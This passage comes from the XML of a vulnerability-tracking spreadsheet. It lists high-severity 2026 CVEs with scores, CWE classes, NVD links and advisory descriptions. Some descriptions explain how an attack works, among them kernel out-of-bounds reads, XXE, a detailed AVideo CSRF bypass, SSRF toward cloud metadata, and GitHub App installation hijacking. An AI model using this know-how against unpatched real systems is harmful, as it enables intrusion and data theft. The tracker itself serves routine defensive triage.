      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90016</t>
        </is>
      </c>
      <c r="D772" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E772" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F772" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G772" s="5" t="inlineStr"/>
      <c r="H772" s="5" t="inlineStr"/>
      <c r="I772" s="5" t="inlineStr"/>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr"/>
      <c r="L772" s="5" t="inlineStr"/>
      <c r="M772" s="5" t="inlineStr"/>
      <c r="N772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O772" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P772" s="5" t="inlineStr"/>
      <c r="Q772" s="5" t="inlineStr"/>
      <c r="R772" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: rtl8723bs: fix OOB read in rtw_restruct_wmm_ie()
rtw_restruct_wmm_ie() scans in_ie for a WMM IE with:
	while (i &lt; in_len) {
		...
		if (i + 5 &lt; in_len &amp;&amp; in_ie[i] == 0xDD &amp;&amp; ...) {
			...
			break;
		}
		i += (in_ie[i + 1] + 2); /* to the next IE element */
	}
When the "i + 5 &lt; in_len" match check fails simply because i is
within 5 bytes of the end of the buffer (i.e. no WMM IE was found
near the tail of in_ie), execution falls through to
"i += (in_ie[i + 1] + 2)", which reads in_ie[i + 1]. If i == in_len
- 1 at that point, this is a 1-byte out-of-bounds read of an
attacker-influenced IE buffer built from association/scan data.
Commit a75281626fc8f ("staging: rtl8723bs: fix potential
out-of-bounds read in rtw_restruct_wmm_ie") added the "i + 5 &lt;
in_len" guard to the match condition itself, but did not add an
equivalent guard before the fallthrough advance, so the same class
of OOB read remained reachable through the non-matching path.
Add an explicit bounds check before advancing to the next IE.</t>
        </is>
      </c>
      <c r="S772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90016</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90017</t>
        </is>
      </c>
      <c r="D773" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F773" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G773" s="5" t="inlineStr"/>
      <c r="H773" s="5" t="inlineStr"/>
      <c r="I773" s="5" t="inlineStr"/>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr"/>
      <c r="L773" s="5" t="inlineStr"/>
      <c r="M773" s="5" t="inlineStr"/>
      <c r="N773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O773" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P773" s="5" t="inlineStr"/>
      <c r="Q773" s="5" t="inlineStr"/>
      <c r="R773" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: rtl8723bs: fix OOB read in rtw_action_frame_parse()
rtw_action_frame_parse() takes a frame_len parameter but never
actually checks it before indexing into the frame body:
	const u8 *frame_body = frame + sizeof(struct ieee80211_hdr_3addr);
	...
	c = frame_body[0];
	...
	a = frame_body[1];
frame_body already points 24 bytes (sizeof(struct
ieee80211_hdr_3addr)) into frame, so reading frame_body[0] and
frame_body[1] requires frame_len &gt;= 26. A management action frame
shorter than that (e.g. exactly 24 bytes, the minimum a malicious
peer can send) causes a 1-2 byte out-of-bounds read.
This is reachable from rtw_cfg80211_monitor_if_xmit_entry() and
cfg80211_rtw_mgmt_tx() in ioctl_cfg80211.c, both of which pass
attacker/user-influenced frame buffers and lengths straight through.
Add the missing length check before frame_body is dereferenced.</t>
        </is>
      </c>
      <c r="S773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90017</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90555</t>
        </is>
      </c>
      <c r="D774" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F774" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G774" s="5" t="inlineStr"/>
      <c r="H774" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I774" s="5" t="inlineStr"/>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr">
        <is>
          <t>vllm:vllm</t>
        </is>
      </c>
      <c r="L774" s="5" t="inlineStr"/>
      <c r="M774" s="5" t="inlineStr"/>
      <c r="N774" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O774" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="P774" s="5" t="inlineStr"/>
      <c r="Q774" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R774" s="5" t="inlineStr">
        <is>
          <t>vLLM versions before 0.28.0 fail to validate audio sample rate headers in the transcription endpoint, allowing authenticated clients to bypass duration checks. Attackers can submit forged FLAC headers with inflated sample rates to trigger excessive memory allocation and crash the API server process affecting all tenants.</t>
        </is>
      </c>
      <c r="S774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90555</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90927</t>
        </is>
      </c>
      <c r="D775" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F775" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I775" s="5" t="inlineStr"/>
      <c r="J775" s="5" t="inlineStr"/>
      <c r="K775" s="5" t="inlineStr"/>
      <c r="L775" s="5" t="inlineStr"/>
      <c r="M775" s="5" t="inlineStr"/>
      <c r="N775" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O775" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P775" s="5" t="inlineStr"/>
      <c r="Q775" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R775" s="5" t="inlineStr">
        <is>
          <t>filebrowser through 2.63.23 fails to limit WebSocket message size in the /api/command handler before checking permissions, allowing authenticated users to buffer arbitrarily large messages. Attackers can send oversized WebSocket messages to exhaust server heap memory and cause denial of service regardless of EnableExec setting or Execute permission.</t>
        </is>
      </c>
      <c r="S775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90927</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91197</t>
        </is>
      </c>
      <c r="D776" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F776" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G776" s="5" t="inlineStr"/>
      <c r="H776" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I776" s="5" t="inlineStr"/>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr"/>
      <c r="L776" s="5" t="inlineStr"/>
      <c r="M776" s="5" t="inlineStr"/>
      <c r="N776" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O776" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P776" s="5" t="inlineStr"/>
      <c r="Q776" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R776" s="5" t="inlineStr">
        <is>
          <t>Flowable flowable-engine through 8.0.0 contains an XML external entity injection vulnerability in ProcessDiagramLayoutFactory.parseXml() that fails to disable external entity resolution when parsing deployed BPMN resources. Attackers with process deployment privileges can embed DOCTYPE declarations with external entities in BPMN files to read arbitrary local files or trigger requests to internal network endpoints when diagram layout is computed.</t>
        </is>
      </c>
      <c r="S776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91197</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92299</t>
        </is>
      </c>
      <c r="D777" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F777" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G777" s="5" t="inlineStr"/>
      <c r="H777" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I777" s="5" t="inlineStr"/>
      <c r="J777" s="5" t="inlineStr"/>
      <c r="K777" s="5" t="inlineStr"/>
      <c r="L777" s="5" t="inlineStr"/>
      <c r="M777" s="5" t="inlineStr"/>
      <c r="N777" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O777" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P777" s="5" t="inlineStr"/>
      <c r="Q777" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R777" s="5" t="inlineStr">
        <is>
          <t>@jitsi/electron-sdk before 10.0.5 exposes getDesktopSources() via contextBridge without requiring an active getDisplayMedia() picker, allowing any script in the meeting page to enumerate screens and windows. Attackers can call the jitsi-screen-sharing-get-sources IPC route to retrieve desktop thumbnails at arbitrary resolution without user consent or operating system permission prompts.</t>
        </is>
      </c>
      <c r="S777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92299</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92456</t>
        </is>
      </c>
      <c r="D778" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F778" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="inlineStr"/>
      <c r="I778" s="5" t="inlineStr"/>
      <c r="J778" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K778" s="5" t="inlineStr"/>
      <c r="L778" s="5" t="inlineStr"/>
      <c r="M778" s="5" t="inlineStr"/>
      <c r="N778" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O778" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P778" s="5" t="inlineStr"/>
      <c r="Q778" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R778" s="5" t="inlineStr">
        <is>
          <t>yshop-crm through 2.1.3 fails to enforce authorization on the saveRedisSet and getRedisSet endpoints in CrmCustomerController, allowing any authenticated back-office user to read and modify installation-wide lead-allocation and customer auto-recycling policy. Attackers can invoke these endpoints to manipulate shared Redis keys controlling customer auto-recycling behavior, causing mass customer data deletion, disabling lead recycling, or blocking customer creation across the deployment.</t>
        </is>
      </c>
      <c r="S778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92456</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92459</t>
        </is>
      </c>
      <c r="D779" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F779" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="inlineStr"/>
      <c r="I779" s="5" t="inlineStr"/>
      <c r="J779" s="5" t="inlineStr"/>
      <c r="K779" s="5" t="inlineStr"/>
      <c r="L779" s="5" t="inlineStr"/>
      <c r="M779" s="5" t="inlineStr"/>
      <c r="N779" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O779" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P779" s="5" t="inlineStr"/>
      <c r="Q779" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R779" s="5" t="inlineStr">
        <is>
          <t>yshop-crm through 2.1.3 contains a missing authorization vulnerability in the CrmCluesController receiveCustomer endpoint that allows authenticated back-office users to claim sales leads without proper permission checks. Attackers can invoke the lead-claim endpoint to reassign leads from other employees to themselves by overwriting the ownerUserId field, with no access logging or quota validation to prevent bulk lead theft.</t>
        </is>
      </c>
      <c r="S779" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92459</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C780" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92582</t>
        </is>
      </c>
      <c r="D780" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E780" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F780" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G780" s="5" t="inlineStr"/>
      <c r="H780" s="5" t="inlineStr"/>
      <c r="I780" s="5" t="inlineStr"/>
      <c r="J780" s="5" t="inlineStr"/>
      <c r="K780" s="5" t="inlineStr"/>
      <c r="L780" s="5" t="inlineStr"/>
      <c r="M780" s="5" t="inlineStr"/>
      <c r="N780" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O780" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P780" s="5" t="inlineStr"/>
      <c r="Q780" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R780" s="5" t="inlineStr">
        <is>
          <t>AVideo (WWBN/AVideo) through 29.0 (commit e01e41ecc) is vulnerable to cross-site request forgery. objects/videoAddNew.json.php disables AVideo's automatic CSRF guard ($global['skipAutoCSRFCheck']) and the untrusted-request check ($global['bypassSameDomainCheck']) merely because 'user' and 'pass' parameters are present in the request; the values are never validated and are read from $_REQUEST, so an attacker can supply them in the query string of a cross-site request. Because User::loginFromRequestIfNotLogged() returns immediately when a session already exists, a victim who is authenticated by cookie satisfies the check while the attacker-supplied credentials are discarded. An attacker who lures an authenticated user with upload rights to visit a crafted page can therefore submit cross-origin requests that modify video records — including ownership transfer (setUsers_id), deletion of user-group access restrictions, can_download, can_share, only_for_paid, video_password, rating, status, creation date, and view count. For a victim with administrator or Permissions::canAdminVideos() rights, any video on the site can be altered, including removing group restrictions from private content. No patched version was available at the time of the advisory.</t>
        </is>
      </c>
      <c r="S780" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92582</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C781" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92601</t>
        </is>
      </c>
      <c r="D781" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E781" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F781" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G781" s="5" t="inlineStr"/>
      <c r="H781" s="5" t="inlineStr"/>
      <c r="I781" s="5" t="inlineStr"/>
      <c r="J781" s="5" t="inlineStr"/>
      <c r="K781" s="5" t="inlineStr"/>
      <c r="L781" s="5" t="inlineStr"/>
      <c r="M781" s="5" t="inlineStr"/>
      <c r="N781" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O781" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P781" s="5" t="inlineStr"/>
      <c r="Q781" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R781" s="5" t="inlineStr">
        <is>
          <t>Guns through 8.3.5 contains an improper access control vulnerability in SysNoticeController where requiredPermission defaults to false and is not overridden by any action methods. Authenticated users without assigned roles can exploit this to create, edit, delete, publish and retract system-wide notices affecting arbitrary users and departments.</t>
        </is>
      </c>
      <c r="S781" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92601</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C782" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92602</t>
        </is>
      </c>
      <c r="D782" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E782" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F782" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="inlineStr"/>
      <c r="I782" s="5" t="inlineStr"/>
      <c r="J782" s="5" t="inlineStr"/>
      <c r="K782" s="5" t="inlineStr"/>
      <c r="L782" s="5" t="inlineStr"/>
      <c r="M782" s="5" t="inlineStr"/>
      <c r="N782" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O782" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P782" s="5" t="inlineStr"/>
      <c r="Q782" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R782" s="5" t="inlineStr">
        <is>
          <t>TDuck survey form through version 5.3 fails to validate webhook URLs or verify form ownership in the WebhookConfigController. Authenticated attackers can attach webhooks to other users' forms and exfiltrate submissions to arbitrary external or internal addresses.</t>
        </is>
      </c>
      <c r="S782" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92602</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C783" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92753</t>
        </is>
      </c>
      <c r="D783" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E783" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F783" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="inlineStr"/>
      <c r="I783" s="5" t="inlineStr"/>
      <c r="J783" s="5" t="inlineStr"/>
      <c r="K783" s="5" t="inlineStr"/>
      <c r="L783" s="5" t="inlineStr"/>
      <c r="M783" s="5" t="inlineStr"/>
      <c r="N783" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O783" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P783" s="5" t="inlineStr"/>
      <c r="Q783" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R783" s="5" t="inlineStr">
        <is>
          <t>PatrowlManager through 1.8.4 contains an authorization bypass vulnerability in the events and alerts API endpoints that lack ownership filtering. Authenticated attackers can read platform event history, delete arbitrary events, and modify alerts belonging to other users.</t>
        </is>
      </c>
      <c r="S783" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92753</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92772</t>
        </is>
      </c>
      <c r="D784" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F784" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G784" s="5" t="inlineStr"/>
      <c r="H784" s="5" t="inlineStr"/>
      <c r="I784" s="5" t="inlineStr"/>
      <c r="J784" s="5" t="inlineStr"/>
      <c r="K784" s="5" t="inlineStr"/>
      <c r="L784" s="5" t="inlineStr"/>
      <c r="M784" s="5" t="inlineStr"/>
      <c r="N784" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O784" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P784" s="5" t="inlineStr"/>
      <c r="Q784" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R784" s="5" t="inlineStr">
        <is>
          <t>Leantime before 3.9.6 contains an authorization bypass vulnerability in the HTMX plugin install endpoint that lacks permission validation. Authenticated users with limited roles can install marketplace plugins and control arbitrary properties including identifier, version, and license key to deploy malicious plugins.</t>
        </is>
      </c>
      <c r="S784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92772</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92773</t>
        </is>
      </c>
      <c r="D785" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E785" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F785" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G785" s="5" t="inlineStr"/>
      <c r="H785" s="5" t="inlineStr"/>
      <c r="I785" s="5" t="inlineStr"/>
      <c r="J785" s="5" t="inlineStr"/>
      <c r="K785" s="5" t="inlineStr"/>
      <c r="L785" s="5" t="inlineStr"/>
      <c r="M785" s="5" t="inlineStr"/>
      <c r="N785" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O785" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P785" s="5" t="inlineStr"/>
      <c r="Q785" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R785" s="5" t="inlineStr">
        <is>
          <t>Trigger.dev before 4.6.0 fails to verify that an authenticated user controls a GitHub App installation before binding it to their organization. Attackers can claim another user's GitHub App installation by replaying state cookies and supplying sequential installation identifiers, gaining unauthorized access to the victim's repositories.</t>
        </is>
      </c>
      <c r="S785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92773</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92804</t>
        </is>
      </c>
      <c r="D786" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E786" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F786" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G786" s="5" t="inlineStr"/>
      <c r="H786" s="5" t="inlineStr"/>
      <c r="I786" s="5" t="inlineStr"/>
      <c r="J786" s="5" t="inlineStr"/>
      <c r="K786" s="5" t="inlineStr"/>
      <c r="L786" s="5" t="inlineStr"/>
      <c r="M786" s="5" t="inlineStr"/>
      <c r="N786" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O786" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P786" s="5" t="inlineStr"/>
      <c r="Q786" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R786" s="5" t="inlineStr">
        <is>
          <t>Nango through 0.70.4 fails to validate caller-supplied connection configuration values interpolated into provider token and proxy URL templates. Authenticated attackers can supply malicious configuration values to direct server requests at internal addresses or cloud metadata endpoints, potentially exfiltrating provider credentials.</t>
        </is>
      </c>
      <c r="S786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92804</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68840</t>
        </is>
      </c>
      <c r="D787" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E787" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F787" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I787" s="5" t="inlineStr"/>
      <c r="J787" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K787"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787" s="5" t="inlineStr"/>
      <c r="M787" s="5" t="inlineStr"/>
      <c r="N787" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O787" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P787" s="5" t="inlineStr"/>
      <c r="Q787" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R787" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68904</t>
        </is>
      </c>
      <c r="D788" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E788" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
